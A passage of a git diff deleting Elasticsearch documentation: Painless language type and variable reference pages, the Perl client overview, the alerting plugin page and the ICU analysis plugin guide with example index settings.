operations. The default value for a -newly-declared reference type variable is `null`. A reference type value is -shallow-copied during an assignment or as an argument for a method/function -call. Assign `null` to a reference type variable to indicate the reference type -value refers to no reference type instance. The JVM will garbage collect a -reference type instance when it is no longer referred to by any reference type -values. Pass `null` as an argument to a method/function call to indicate the -argument refers to no reference type instance. - -A reference type object defines zero-to-many of each of the following: - -static member field:: - -A static member field is a named and typed piece of data. Each reference type -*object* contains one set of data representative of its static member fields. -Use the <> in correspondence with -the reference type object name to access a static member field for loading and -storing to a specific reference type *object*. No reference type instance -allocation is necessary to use a static member field. - -non-static member field:: - -A non-static member field is a named and typed piece of data. Each reference -type *instance* contains one set of data representative of its reference type -object's non-static member fields. Use the -<> for loading and storing to a -non-static member field of a specific reference type *instance*. An allocated -reference type instance is required to use a non-static member field. - -static member method:: - -A static member method is a <> called on a -reference type *object*. Use the <> -in correspondence with the reference type object name to call a static member -method. No reference type instance allocation is necessary to use a static -member method. - -non-static member method:: - -A non-static member method is a <> called on a -reference type *instance*. A non-static member method called on a reference type -instance can load from and store to non-static member fields of that specific -reference type instance. Use the <> -in correspondence with a specific reference type instance to call a non-static -member method. An allocated reference type instance is required to use a -non-static member method. - -constructor:: - -A constructor is a special type of <> used to -allocate a reference type *instance* defined by a specific reference type -*object*. Use the <> to allocate -a reference type instance. - -A reference type object follows a basic inheritance model. Consider types A and -B. Type A is considered to be a parent of B, and B a child of A, if B inherits -(is able to access as its own) all of A's non-static members. Type B is -considered a descendant of A if there exists a recursive parent-child -relationship from B to A with none to many types in between. In this case, B -inherits all of A's non-static members along with all of the non-static members -of the types in between. Type B is also considered to be a type A in both -relationships. - -*Examples* - -* Reference types evaluated in several different operations. -+ -[source,Painless] ----- -List l = new ArrayList(); <1> -l.add(1); <2> -int i = l.get(0) + 2; <3> ----- -+ -<1> declare `List l`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `l` -<2> load from `l` -> `List reference`; - implicit cast `int 1` to `def` -> `def` - call `add` on `List reference` with arguments (`def`) -<3> declare `int i`; - load from `l` -> `List reference`; - call `get` on `List reference` with arguments (`int 0`) -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - add `int 1` and `int 2` -> `int 3`; - store `int 3` to `i` -+ -* Sharing a reference type instance. -+ -[source,Painless] ----- -List l0 = new ArrayList(); <1> -List l1 = l0; <2> -l0.add(1); <3> -l1.add(2); <4> -int i = l1.get(0) + l0.get(1); <5> ----- -+ -<1> declare `List l0`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `l0` -<2> declare `List l1`; - load from `l0` -> `List reference`; - store `List reference` to `l1` - (note `l0` and `l1` refer to the same instance known as a shallow-copy) -<3> load from `l0` -> `List reference`; - implicit cast `int 1` to `def` -> `def` - call `add` on `List reference` with arguments (`def`) -<4> load from `l1` -> `List reference`; - implicit cast `int 2` to `def` -> `def` - call `add` on `List reference` with arguments (`def`) -<5> declare `int i`; - load from `l0` -> `List reference`; - call `get` on `List reference` with arguments (`int 0`) -> `def @0`; - implicit cast `def @0` to `int 1` -> `int 1`; - load from `l1` -> `List reference`; - call `get` on `List reference` with arguments (`int 1`) -> `def @1`; - implicit cast `def @1` to `int 2` -> `int 2`; - add `int 1` and `int 2` -> `int 3`; - store `int 3` to `i`; -+ -* Using the static members of a reference type. -+ -[source,Painless] ----- -int i = Integer.MAX_VALUE; <1> -long l = Long.parseLong("123L"); <2> ----- -+ -<1> declare `int i`; - load from `MAX_VALUE` on `Integer` -> `int 2147483647`; - store `int 2147483647` to `i` -<2> declare `long l`; - call `parseLong` on `Long` with arguments (`long 123`) -> `long 123`; - store `long 123` to `l` - -[[dynamic-types]] -==== Dynamic Types - -A dynamic type value can represent the value of any primitive type or -reference type using a single type name `def`. A `def` type value mimics -the behavior of whatever value it represents at run-time and will always -represent the child-most descendant type value of any type value when evaluated -during operations. - -Declare a `def` type <> or access a `def` type -member field (from a reference type instance), and assign it any type of value -for evaluation during later operations. The default value for a newly-declared -`def` type variable is `null`. A `def` type variable or method/function -parameter can change the type it represents during the compilation and -evaluation of a script. - -Using the `def` type can have a slight impact on performance. Use only primitive -types and reference types directly when performance is critical. - -*Errors* - -* If a `def` type value represents an inappropriate type for evaluation of an - operation at run-time. - -*Examples* - -* General uses of the `def` type. -+ -[source,Painless] ----- -def dp = 1; <1> -def dr = new ArrayList(); <2> -dr = dp; <3> ----- -+ -<1> declare `def dp`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `dp` -<2> declare `def dr`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `dr` -<3> load from `dp` -> `def`; - store `def` to `dr`; - (note the switch in the type `dr` represents from `ArrayList` to `int`) -+ -* A `def` type value representing the child-most descendant of a value. -+ -[source,Painless] ----- -Object l = new ArrayList(); <1> -def d = l; <2> -d.ensureCapacity(10); <3> ----- -+ -<1> declare `Object l`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `Object reference` - -> `Object reference`; - store `Object reference` to `l` -<2> declare `def d`; - load from `l` -> `Object reference`; - implicit cast `Object reference` to `def` -> `def`; - store `def` to `d`; -<3> load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `ensureCapacity` on `ArrayList reference` with arguments (`int 10`); - (note `def` was implicit cast to `ArrayList reference` - since ArrayList` is the child-most descendant type value that the - `def` type value represents) - -[[string-type]] -==== String Type - -The `String` type is a specialized reference type that does not require -explicit allocation. Use a <> to directly -evaluate a `String` type value. While not required, the -<> can allocate `String` type -instances. - -*Examples* - -* General use of the `String` type. -+ -[source,Painless] ----- -String r = "some text"; <1> -String s = 'some text'; <2> -String t = new String("some text"); <3> -String u; <4> ----- -+ -<1> declare `String r`; - store `String "some text"` to `r` -<2> declare `String s`; - store `String 'some text'` to `s` -<3> declare `String t`; - allocate `String` instance with arguments (`String "some text"`) - -> `String "some text"`; - store `String "some text"` to `t` -<4> declare `String u`; - store default `null` to `u` - -[[void-type]] -==== void Type - -The `void` type represents the concept of a lack of type. Use the `void` type to -indicate a function returns no value. - -*Examples* - -* Use of the `void` type in a function. -+ -[source,Painless] ----- -void addToList(List l, def d) { - l.add(d); -} ----- - -[[array-type]] -==== Array Type - -An array type is a specialized reference type where an array type instance -contains a series of values allocated to the heap. Each value in an array type -instance is defined as an element. All elements in an array type instance are of -the same type (element type) specified as part of declaration. Each element is -assigned an index within the range `[0, length)` where length is the total -number of elements allocated for an array type instance. - -Use the <> or the -<> to allocate an -array type instance. Declare an array type <> or -access an array type member field (from a reference type instance), and assign -it an array type value for evaluation during later operations. The default value -for a newly-declared array type variable is `null`. An array type value is -shallow-copied during an assignment or as an argument for a method/function -call. Assign `null` to an array type variable to indicate the array type value -refers to no array type instance. The JVM will garbage collect an array type -instance when it is no longer referred to by any array type values. Pass `null` -as an argument to a method/function call to indicate the argument refers to no -array type instance. - -Use the <> to retrieve the length -of an array type value as an `int` type value. Use the -<> to load from and store to -an individual element within an array type instance. - -When an array type instance is allocated with multiple dimensions using the -range `[2, d]` where `d >= 2`, each element within each dimension in the range -`[1, d-1]` is also an array type. The element type of each dimension, `n`, is an -array type with the number of dimensions equal to `d-n`. For example, consider -`int[][][]` with 3 dimensions. Each element in the 3rd dimension, `d-3`, is the -primitive type `int`. Each element in the 2nd dimension, `d-2`, is the array -type `int[]`. And each element in the 1st dimension, `d-1` is the array type -`int[][]`. - -*Examples* - -* General use of single-dimensional arrays. -+ -[source,Painless] ----- -int[] x; <1> -float[] y = new float[10]; <2> -def z = new float[5]; <3> -y[9] = 1.0F; <4> -z[0] = y[9]; <5> ----- -+ -<1> declare `int[] x`; - store default `null` to `x` -<2> declare `float[] y`; - allocate `1-d float array` instance with `length [10]` - -> `1-d float array reference`; - store `1-d float array reference` to `y` -<3> declare `def z`; - allocate `1-d float array` instance with `length [5]` - -> `1-d float array reference`; - implicit cast `1-d float array reference` to `def` -> `def`; - store `def` to `z` -<4> load from `y` -> `1-d float array reference`; - store `float 1.0` to `index [9]` of `1-d float array reference` -<5> load from `y` -> `1-d float array reference @0`; - load from `index [9]` of `1-d float array reference @0` -> `float 1.0`; - load from `z` -> `def`; - implicit cast `def` to `1-d float array reference @1` - -> `1-d float array reference @1`; - store `float 1.0` to `index [0]` of `1-d float array reference @1` -+ -* General use of a multi-dimensional array. -+ -[source,Painless] ----- -int[][][] ia3 = new int[2][3][4]; <1> -ia3[1][2][3] = 99; <2> -int i = ia3[1][2][3]; <3> ----- -+ -<1> declare `int[][][] ia`; - allocate `3-d int array` instance with length `[2, 3, 4]` - -> `3-d int array reference`; - store `3-d int array reference` to `ia3` -<2> load from `ia3` -> `3-d int array reference`; - store `int 99` to `index [1, 2, 3]` of `3-d int array reference` -<3> declare `int i`; - load from `ia3` -> `3-d int array reference`; - load from `index [1, 2, 3]` of `3-d int array reference` -> `int 99`; - store `int 99` to `i` diff --git a/docs/painless/painless-lang-spec/painless-variables.asciidoc b/docs/painless/painless-lang-spec/painless-variables.asciidoc deleted file mode 100644 index d86b8ba1721..00000000000 --- a/docs/painless/painless-lang-spec/painless-variables.asciidoc +++ /dev/null @@ -1,204 +0,0 @@ -[[painless-variables]] -=== Variables - -A variable loads and stores a value for evaluation during -<>. - -[[variable-declaration]] -==== Declaration - -Declare a variable before use with the format of <> -followed by <>. Declare an -<> variable using an opening `[` token and a closing `]` -token for each dimension directly after the identifier. Specify a -comma-separated list of identifiers following the type to declare multiple -variables in a single statement. Use an -<> combined with a declaration to -immediately assign a value to a variable. A variable not immediately assigned a -value will have a default value assigned implicitly based on the type. - -*Errors* - -* If a variable is used prior to or without declaration. - -*Grammar* - -[source,ANTLR4] ----- -declaration : type ID assignment? (',' ID assignment?)*; -type: ID ('.' ID)* ('[' ']')*; -assignment: '=' expression; ----- - -*Examples* - -* Different variations of variable declaration. -+ -[source,Painless] ----- -int x; <1> -List y; <2> -int x, y = 5, z; <3> -def d; <4> -int i = 10; <5> -float[] f; <6> -Map[][] m; <7> ----- -+ -<1> declare `int x`; - store default `null` to `x` -<2> declare `List y`; - store default `null` to `y` -<3> declare `int x`; - store default `int 0` to `x`; - declare `int y`; - store `int 5` to `y`; - declare `int z`; - store default `int 0` to `z`; -<4> declare `def d`; - store default `null` to `d` -<5> declare `int i`; - store `int 10` to `i` -<6> declare `float[] f`; - store default `null` to `f` -<7> declare `Map[][] m`; - store default `null` to `m` - -[[variable-assignment]] -==== Assignment - -Use the `assignment operator '='` to store a value in a variable for use in -subsequent operations. Any operation that produces a value can be assigned to -any variable as long as the <> are the same or the -resultant type can be <> to the variable -type. - -*Errors* - -* If the type of value is unable to match the type of variable. - -*Grammar* - -[source,ANTLR4] ----- -assignment: ID '=' expression ----- - -*Examples* - -* Variable assignment with an integer literal. -+ -[source,Painless] ----- -int i; <1> -i = 10; <2> ----- -+ -<1> declare `int i`; - store default `int 0` to `i` -<2> store `int 10` to `i` -+ -* Declaration combined with immediate assignment. -+ -[source,Painless] ----- -int i = 10; <1> -double j = 2.0; <2> ----- -+ -<1> declare `int i`; - store `int 10` to `i` -<2> declare `double j`; - store `double 2.0` to `j` -+ -* Assignment of one variable to another using primitive type values. -+ -[source,Painless] ----- -int i = 10; <1> -int j = i; <2> ----- -+ -<1> declare `int i`; - store `int 10` to `i` -<2> declare `int j`; - load from `i` -> `int 10`; - store `int 10` to `j` -+ -* Assignment with reference types using the - <>. -+ -[source,Painless] ----- -ArrayList l = new ArrayList(); <1> -Map m = new HashMap(); <2> ----- -+ -<1> declare `ArrayList l`; - allocate `ArrayList` instance -> `ArrayList reference`; - store `ArrayList reference` to `l` -<2> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `m` -+ -* Assignment of one variable to another using reference type values. -+ -[source,Painless] ----- -List l = new ArrayList(); <1> -List k = l; <2> -List m; <3> -m = k; <4> ----- -+ -<1> declare `List l`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `l` -<2> declare `List k`; - load from `l` -> `List reference`; - store `List reference` to `k`; - (note `l` and `k` refer to the same instance known as a shallow-copy) -<3> declare `List m`; - store default `null` to `m` -<4> load from `k` -> `List reference`; - store `List reference` to `m`; - (note `l`, `k`, and `m` refer to the same instance) -+ -* Assignment with array type variables using the - <>. -+ -[source,Painless] ----- -int[] ia1; <1> -ia1 = new int[2]; <2> -ia1[0] = 1; <3> -int[] ib1 = ia1; <4> -int[][] ic2 = new int[2][5]; <5> -ic2[1][3] = 2; <6> -ic2[0] = ia1; <7> ----- -+ -<1> declare `int[] ia1`; - store default `null` to `ia1` -<2> allocate `1-d int array` instance with `length [2]` - -> `1-d int array reference`; - store `1-d int array reference` to `ia1` -<3> load from `ia1` -> `1-d int array reference`; - store `int 1` to `index [0]` of `1-d int array reference` -<4> declare `int[] ib1`; - load from `ia1` -> `1-d int array reference`; - store `1-d int array reference` to `ib1`; - (note `ia1` and `ib1` refer to the same instance known as a shallow copy) -<5> declare `int[][] ic2`; - allocate `2-d int array` instance with `length [2, 5]` - -> `2-d int array reference`; - store `2-d int array reference` to `ic2` -<6> load from `ic2` -> `2-d int array reference`; - store `int 2` to `index [1, 3]` of `2-d int array reference` -<7> load from `ia1` -> `1-d int array reference`; - load from `ic2` -> `2-d int array reference`; - store `1-d int array reference` to - `index [0]` of `2-d int array reference`; - (note `ia1`, `ib1`, and `index [0]` of `ia2` refer to the same instance) diff --git a/docs/painless/redirects.asciidoc b/docs/painless/redirects.asciidoc deleted file mode 100644 index 94dd5524e9a..00000000000 --- a/docs/painless/redirects.asciidoc +++ /dev/null @@ -1,9 +0,0 @@ -["appendix",role="exclude",id="redirects"] -= Deleted pages - -The following pages have moved or been deleted. - -[role="exclude",id="painless-examples"] -=== Painless examples - -See <>. \ No newline at end of file diff --git a/docs/perl/index.asciidoc b/docs/perl/index.asciidoc deleted file mode 100644 index d009b3d0460..00000000000 --- a/docs/perl/index.asciidoc +++ /dev/null @@ -1,124 +0,0 @@ -= Elasticsearch.pm - -== Overview - -Search::Elasticsearch is the official Perl API for Elasticsearch. The full -documentation is available on https://metacpan.org/module/Search::Elasticsearch. - -It can be installed with: - -[source,sh] ------------------------------------- -cpanm Search::Elasticsearch ------------------------------------- - -=== Features - -This client provides: - -* Full support for all Elasticsearch APIs - -* HTTP backend (blocking and asynchronous with https://metacpan.org/module/Search::Elasticsearch::Async) - -* Robust networking support which handles load balancing, failure detection and failover - -* Good defaults - -* Helper utilities for more complex operations, such as bulk indexing, scrolled searches and reindexing. - -* Logging support via Log::Any - -* Compatibility with the official clients for Python, Ruby, PHP and JavaScript - -* Easy extensibility - -== Synopsis - -[source,perl] ------------------------------------- -use Search::Elasticsearch; - -# Connect to localhost:9200: -my $e = Search::Elasticsearch->new(); - -# Round-robin between two nodes: -my $e = Search::Elasticsearch->new( - nodes => [ - 'search1:9200', - 'search2:9200' - ] -); - -# Connect to cluster at search1:9200, sniff all nodes and round-robin between them: -my $e = Search::Elasticsearch->new( - nodes => 'search1:9200', - cxn_pool => 'Sniff' -); - -# Index a document: -$e->index( - index => 'my_app', - type => 'blog_post', - id => 1, - body => { - title => 'Elasticsearch clients', - content => 'Interesting content...', - date => '2014-09-24' - } -); - -# Get the document: -my $doc = $e->get( - index => 'my_app', - type => 'blog_post', - id => 1 -); - -# Search: -my $results = $e->search( - index => 'my_app', - body => { - query => { - match => { title => 'elasticsearch' } - } - } -); ------------------------------------- - -[[v0_90]] -== Elasticsearch 0.90.* and earlier - -The current version of the client supports the Elasticsearch 1.0 branch by -default, which is not backwards compatible with the 0.90 branch. - -If you need to talk to a version of Elasticsearch before 1.0.0, -please use `Search::Elasticsearch::Client::0_90::Direct` as follows: - -[source,perl] ------------------------------------- - $es = Search::Elasticsearch->new( - client => '0_90::Direct' - ); ------------------------------------- - - -== Reporting issues - -The GitHub repository is https://github.com/elastic/elasticsearch-perl -and any issues can be reported on the issues list at -https://github.com/elastic/elasticsearch-perl/issues. - -== Contributing - -Open source contributions are welcome. Please read our -https://github.com/elastic/elasticsearch-perl/blob/master/CONTRIBUTING.asciidoc[guide to contributing]. - -== Copyright and License - -This software is Copyright (c) 2013-2018 by Elasticsearch BV. - -This is free software, licensed under: -https://github.com/elastic/elasticsearch-perl/blob/master/LICENSE.txt[The Apache License Version 2.0]. - - - diff --git a/docs/plugins/alerting.asciidoc b/docs/plugins/alerting.asciidoc deleted file mode 100644 index a440b6b8367..00000000000 --- a/docs/plugins/alerting.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[[alerting]] -== Alerting Plugins - -Alerting plugins allow Elasticsearch to monitor indices and to trigger alerts when thresholds are breached. - -[discrete] -=== Core alerting plugins - -The core alerting plugins are: - -link:/products/x-pack/alerting[X-Pack]:: - -X-Pack contains the alerting and notification product for Elasticsearch that -lets you take action based on changes in your data. It is designed around the -principle that if you can query something in Elasticsearch, you can alert on -it. Simply define a query, condition, schedule, and the actions to take, and -X-Pack will do the rest. diff --git a/docs/plugins/analysis-icu.asciidoc b/docs/plugins/analysis-icu.asciidoc deleted file mode 100644 index a8041e47100..00000000000 --- a/docs/plugins/analysis-icu.asciidoc +++ /dev/null @@ -1,557 +0,0 @@ -[[analysis-icu]] -=== ICU Analysis Plugin - -The ICU Analysis plugin integrates the Lucene ICU module into {es}, -adding extended Unicode support using the http://site.icu-project.org/[ICU] -libraries, including better analysis of Asian languages, Unicode -normalization, Unicode-aware case folding, collation support, and -transliteration. - -[IMPORTANT] -.ICU analysis and backwards compatibility -================================================ - -From time to time, the ICU library receives updates such as adding new -characters and emojis, and improving collation (sort) orders. These changes -may or may not affect search and sort orders, depending on which characters -sets you are using. - -While we restrict ICU upgrades to major versions, you may find that an index -created in the previous major version will need to be reindexed in order to -return correct (and correctly ordered) results, and to take advantage of new -characters. - -================================================ - -:plugin_name: analysis-icu -include::install_remove.asciidoc[] - -[[analysis-icu-analyzer]] -==== ICU Analyzer - -The `icu_analyzer` analyzer performs basic normalization, tokenization and character folding, using the -`icu_normalizer` char filter, `icu_tokenizer` and `icu_folding` token filter - -The following parameters are accepted: - -[horizontal] - -`method`:: - - Normalization method. Accepts `nfkc`, `nfc` or `nfkc_cf` (default) - -`mode`:: - - Normalization mode. Accepts `compose` (default) or `decompose`. - -[[analysis-icu-normalization-charfilter]] -==== ICU Normalization Character Filter - -Normalizes characters as explained -http://userguide.icu-project.org/transforms/normalization[here]. -It registers itself as the `icu_normalizer` character filter, which is -available to all indices without any further configuration. The type of -normalization can be specified with the `name` parameter, which accepts `nfc`, -`nfkc`, and `nfkc_cf` (default). Set the `mode` parameter to `decompose` to -convert `nfc` to `nfd` or `nfkc` to `nfkd` respectively: - -Which letters are normalized can be controlled by specifying the -`unicode_set_filter` parameter, which accepts a -https://icu-project.org/apiref/icu4j/com/ibm/icu/text/UnicodeSet.html[UnicodeSet]. - -Here are two examples, the default usage and a customised character filter: - - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "nfkc_cf_normalized": { <1> - "tokenizer": "icu_tokenizer", - "char_filter": [ - "icu_normalizer" - ] - }, - "nfd_normalized": { <2> - "tokenizer": "icu_tokenizer", - "char_filter": [ - "nfd_normalizer" - ] - } - }, - "char_filter": { - "nfd_normalizer": { - "type": "icu_normalizer", - "name": "nfc", - "mode": "decompose" - } - } - } - } - } -} --------------------------------------------------- - -<1> Uses the default `nfkc_cf` normalization. -<2> Uses the customized `nfd_normalizer` token filter, which is set to use `nfc` normalization with decomposition. - -[[analysis-icu-tokenizer]] -==== ICU Tokenizer - -Tokenizes text into words on word boundaries, as defined in -https://www.unicode.org/reports/tr29/[UAX #29: Unicode Text Segmentation]. -It behaves much like the {ref}/analysis-standard-tokenizer.html[`standard` tokenizer], -but adds better support for some Asian languages by using a dictionary-based -approach to identify words in Thai, Lao, Chinese, Japanese, and Korean, and -using custom rules to break Myanmar and Khmer text into syllables. - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_icu_analyzer": { - "tokenizer": "icu_tokenizer" - } - } - } - } - } -} --------------------------------------------------- - -===== Rules customization - -experimental[This functionality is marked as experimental in Lucene] - -You can customize the `icu-tokenizer` behavior by specifying per-script rule files, see the -http://userguide.icu-project.org/boundaryanalysis#TOC-RBBI-Rules[RBBI rules syntax reference] -for a more detailed explanation. - -To add icu tokenizer rules, set the `rule_files` settings, which should contain a comma-separated list of -`code:rulefile` pairs in the following format: -https://unicode.org/iso15924/iso15924-codes.html[four-letter ISO 15924 script code], -followed by a colon, then a rule file name. Rule files are placed `ES_HOME/config` directory. - -As a demonstration of how the rule files can be used, save the following user file to `$ES_HOME/config/KeywordTokenizer.rbbi`: - -[source,text] ------------------------ -.+ {200}; ------------------------ - -Then create an analyzer to use this rule file as follows: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "icu_user_file": { - "type": "icu_tokenizer", - "rule_files": "Latn:KeywordTokenizer.rbbi" - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "icu_user_file" - } - } - } - } - } -} - -GET icu_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "Elasticsearch. Wow!" -} --------------------------------------------------- - -The above `analyze` request returns the following: - -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "Elasticsearch. Wow!", - "start_offset": 0, - "end_offset": 19, - "type": "", - "position": 0 - } - ] -} --------------------------------------------------- - - -[[analysis-icu-normalization]] -==== ICU Normalization Token Filter - -Normalizes characters as explained -http://userguide.icu-project.org/transforms/normalization[here]. It registers -itself as the `icu_normalizer` token filter, which is available to all indices -without any further configuration. The type of normalization can be specified -with the `name` parameter, which accepts `nfc`, `nfkc`, and `nfkc_cf` -(default). - -Which letters are normalized can be controlled by specifying the -`unicode_set_filter` parameter, which accepts a -https://icu-project.org/apiref/icu4j/com/ibm/icu/text/UnicodeSet.html[UnicodeSet]. - -You should probably prefer the <>. - -Here are two examples, the default usage and a customised token filter: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "nfkc_cf_normalized": { <1> - "tokenizer": "icu_tokenizer", - "filter": [ - "icu_normalizer" - ] - }, - "nfc_normalized": { <2> - "tokenizer": "icu_tokenizer", - "filter": [ - "nfc_normalizer" - ] - } - }, - "filter": { - "nfc_normalizer": { - "type": "icu_normalizer", - "name": "nfc" - } - } - } - } - } -} --------------------------------------------------- - -<1> Uses the default `nfkc_cf` normalization. -<2> Uses the customized `nfc_normalizer` token filter, which is set to use `nfc` normalization. - - -[[analysis-icu-folding]] -==== ICU Folding Token Filter - -Case folding of Unicode characters based on `UTR#30`, like the -{ref}/analysis-asciifolding-tokenfilter.html[ASCII-folding token filter] -on steroids. It registers itself as the `icu_folding` token filter and is -available to all indices: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "folded": { - "tokenizer": "icu_tokenizer", - "filter": [ - "icu_folding" - ] - } - } - } - } - } -} --------------------------------------------------- - -The ICU folding token filter already does Unicode normalization, so there is -no need to use Normalize character or token filter as well. - -Which letters are folded can be controlled by specifying the -`unicode_set_filter` parameter, which accepts a -https://icu-project.org/apiref/icu4j/com/ibm/icu/text/UnicodeSet.html[UnicodeSet]. - -The following example exempts Swedish characters from folding. It is important -to note that both upper and lowercase forms should be specified, and that -these filtered character are not lowercased which is why we add the -`lowercase` filter as well: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "swedish_analyzer": { - "tokenizer": "icu_tokenizer", - "filter": [ - "swedish_folding", - "lowercase" - ] - } - }, - "filter": { - "swedish_folding": { - "type": "icu_folding", - "unicode_set_filter": "[^åäöÅÄÖ]" - } - } - } - } - } -} --------------------------------------------------- - - -[[analysis-icu-collation]] -==== ICU Collation Token Filter - -[WARNING] -====== -This token filter has been deprecated since Lucene 5.0. Please use -<>. -====== - -[[analysis-icu-collation-keyword-field]] -==== ICU Collation Keyword Field - -Collations are used for sorting documents in a language-specific word order. -The `icu_collation_keyword` field type is available to all indices and will encode -the terms directly as bytes in a doc values field and a single indexed token just -like a standard {ref}/keyword.html[Keyword Field]. - -Defaults to using {defguide}/sorting-collations.html#uca[DUCET collation], -which is a best-effort attempt at language-neutral sorting. - -Below is an example of how to set up a field for sorting German names in -``phonebook'' order: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "name": { <1> - "type": "text", - "fields": { - "sort": { <2> - "type": "icu_collation_keyword", - "index": false, - "language": "de", - "country": "DE", - "variant": "@collation=phonebook" - } - } - } - } - } -} - -GET /my-index-000001/_search <3> -{ - "query": { - "match": { - "name": "Fritz" - } - }, - "sort": "name.sort" -} - --------------------------- - -<1> The `name` field uses the `standard` analyzer, and so support full text queries. -<2> The `name.sort` field is an `icu_collation_keyword` field that will preserve the name as - a single token doc values, and applies the German ``phonebook'' order. -<3> An example query which searches the `name` field and sorts on the `name.sort` field. - -===== Parameters for ICU Collation Keyword Fields - -The following parameters are accepted by `icu_collation_keyword` fields: - -[horizontal] - -`doc_values`:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -`index`:: - - Should the field be searchable? Accepts `true` (default) or `false`. - -`null_value`:: - - Accepts a string value which is substituted for any explicit `null` - values. Defaults to `null`, which means the field is treated as missing. - -{ref}/ignore-above.html[`ignore_above`]:: - - Strings longer than the `ignore_above` setting will be ignored. - Checking is performed on the original string before the collation. - The `ignore_above` setting can be updated on existing fields - using the {ref}/indices-put-mapping.html[PUT mapping API]. - By default, there is no limit and all values will be indexed. - -`store`:: - - Whether the field value should be stored and retrievable separately from - the {ref}/mapping-source-field.html[`_source`] field. Accepts `true` or `false` - (default). - -`fields`:: - - Multi-fields allow the same string value to be indexed in multiple ways for - different purposes, such as one field for search and a multi-field for - sorting and aggregations. - -===== Collation options - -`strength`:: - -The strength property determines the minimum level of difference considered -significant during comparison. Possible values are : `primary`, `secondary`, -`tertiary`, `quaternary` or `identical`. See the -https://icu-project.org/apiref/icu4j/com/ibm/icu/text/Collator.html[ICU Collation documentation] -for a more detailed explanation for each value. Defaults to `tertiary` -unless otherwise specified in the collation. - -`decomposition`:: - -Possible values: `no` (default, but collation-dependent) or `canonical`. -Setting this decomposition property to `canonical` allows the Collator to -handle unnormalized text properly, producing the same results as if the text -were normalized. If `no` is set, it is the user's responsibility to insure -that all text is already in the appropriate form before a comparison or before -getting a CollationKey. Adjusting decomposition mode allows the user to select -between faster and more complete collation behavior. Since a great many of the -world's languages do not require text normalization, most locales set `no` as -the default decomposition mode. - -The following options are expert only: - -`alternate`:: - -Possible values: `shifted` or `non-ignorable`. Sets the alternate handling for -strength `quaternary` to be either shifted or non-ignorable. Which boils down -to ignoring punctuation and whitespace. - -`case_level`:: - -Possible values: `true` or `false` (default). Whether case level sorting is -required. When strength is set to `primary` this will ignore accent -differences. - - -`case_first`:: - -Possible values: `lower` or `upper`. Useful to control which case is sorted -first when case is not ignored for strength `tertiary`. The default depends on -the collation. - -`numeric`:: - -Possible values: `true` or `false` (default) . Whether digits are sorted -according to their numeric representation. For example the value `egg-9` is -sorted before the value `egg-21`. - - -`variable_top`:: - -Single character or contraction. Controls what is variable for `alternate`. - -`hiragana_quaternary_mode`:: - -Possible values: `true` or `false`. Distinguishing between Katakana and -Hiragana characters in `quaternary` strength. - - -[[analysis-icu-transform]] -==== ICU Transform Token Filter - -Transforms are used to process Unicode text in many different ways, such as -case mapping, normalization, transliteration and bidirectional text handling. - -You can define which transformation you want to apply with the `id` parameter -(defaults to `Null`), and specify text direction with the `dir` parameter -which accepts `forward` (default) for LTR and `reverse` for RTL. Custom -rulesets are not yet supported. - -For example: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "latin": { - "tokenizer": "keyword", - "filter": [ - "myLatinTransform" - ] - } - }, - "filter": { - "myLatinTransform": { - "type": "icu_transform", - "id": "Any-Latin; NFD; [:Nonspacing Mark:] Remove; NFC" <1> - } - } - } - } - } -} - -GET icu_sample/_analyze -{ - "analyzer": "latin", - "text": "你好" <2> -} - -GET icu_sample/_analyze -{ - "analyzer": "latin", - "text": "здравствуйте" <3> -} - -GET icu_sample/_analyze -{ - "analyzer": "latin", - "text": "こんにちは" <4> -} - --------------------------------------------------- - -<1> This transforms transliterates characters to Latin, and separates accents - from their base characters, removes the accents, and then puts the - remaining text into an unaccented form. - -<2> Returns `ni hao`. -<3> Returns `zdravstvujte`. -<4> Returns `kon'nichiha`. - -For more documentation, Please see the http://userguide.icu-project.org/transforms/general[user guide of ICU Transform]. diff --git a/docs/plugins/analysis-kuromoji.asciidoc b/docs/plugins/analysis-kuromoji.asciidoc deleted file mode 100644 index 4b1f3408882..00000000000 --- a/docs/plugins/analysis-kuromoji.asciidoc +++ /dev/null @@ -1,626 +0,0 @@ -[[analysis-kuromoji]] -=== Japanese (kuromoji) Analysis Plugin - -The Japanese (kuromoji) Analysis plugin integrates Lucene kuromoji analysis -module into {es}. - -:plugin_name: analysis-kuromoji -include::install_remove.asciidoc[] - -[[analysis-kuromoji-analyzer]] -==== `kuromoji` analyzer - -The `kuromoji` analyzer consists of the following tokenizer and token filters: - -* <> -* <> token filter -* <> token filter -* 